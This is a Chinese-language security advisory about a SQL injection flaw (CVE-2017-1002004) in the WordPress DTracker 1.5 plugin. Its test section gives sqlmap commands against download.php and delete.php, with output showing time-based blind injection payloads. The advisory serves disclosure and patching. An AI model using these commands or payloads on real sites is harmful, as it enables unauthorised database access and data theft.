安全研究

安全漏洞
WordPress DTracker SQL注入漏洞(CVE-2017-1002004)

发布日期:2017-03-13
更新日期:2017-03-14

受影响系统:
WordPress DTracker 1.5
描述:
BUGTRAQ  ID: 96781
CVE(CAN) ID: CVE-2017-1002004

WordPress是一种使用PHP语言开发的博客平台。

Wordpress DTracker v1.5版本在实现上存在SQL注入漏洞,此漏洞位于./dtracker/download.php文件中。攻击者利用此漏洞可控制应用、访问或修改数据等。

<*来源:Larry W. Cashdollar (lwc@vapid.dhs.org
  
  链接:http://seclists.org/oss-sec/2017/q1/575
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Larry W. Cashdollar (lwc@vapid.dhs.org)提供了如下测试方法:


        &#8226; $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*&apos;  --dbms mysql  
--level 3 --risk 3
        &#8226; URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
        &#8226; sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
        &#8226; ---
        &#8226; Parameter: #1* (URI)
        &#8226;     Type: AND/OR time-based blind
        &#8226;     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        &#8226;     Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN
(7148=7148) THEN SLEEP(5) ELSE 7148 END)
        &#8226; ---
        &#8226; [10:14:09] [INFO] the back-end DBMS is MySQL
        &#8226; web server operating system: Linux Ubuntu 16.04 (xenial)
        &#8226; web application technology: Apache 2.4.18
        &#8226; back-end DBMS: MySQL >= 5.0.12
        &#8226; [10:14:09] [WARNING] HTTP error codes detected during run:
        &#8226; 404 (Not Found) - 14 times
        &#8226; [10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
        


        &#8226; $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php&apos; --data 'contact_id=*'  
--dbms mysql --risk 1 --level 3
        &#8226;  
        &#8226; (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
        &#8226; sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
        &#8226; ---
        &#8226; Parameter: #1* ((custom) POST)
        &#8226;     Type: AND/OR time-based blind
        &#8226;     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
        &#8226;     Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
        &#8226; ---
        &#8226; [11:53:27] [INFO] the back-end DBMS is MySQL
        &#8226; web server operating system: Linux Ubuntu 16.04 (xenial)
        &#8226; web application technology: Apache 2.4.18
        &#8226; back-end DBMS: MySQL >= 5.0.12
        &#8226; [11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

建议:
厂商补丁:

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://wordpress.org/plugins/dtracker/

浏览次数:2725
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障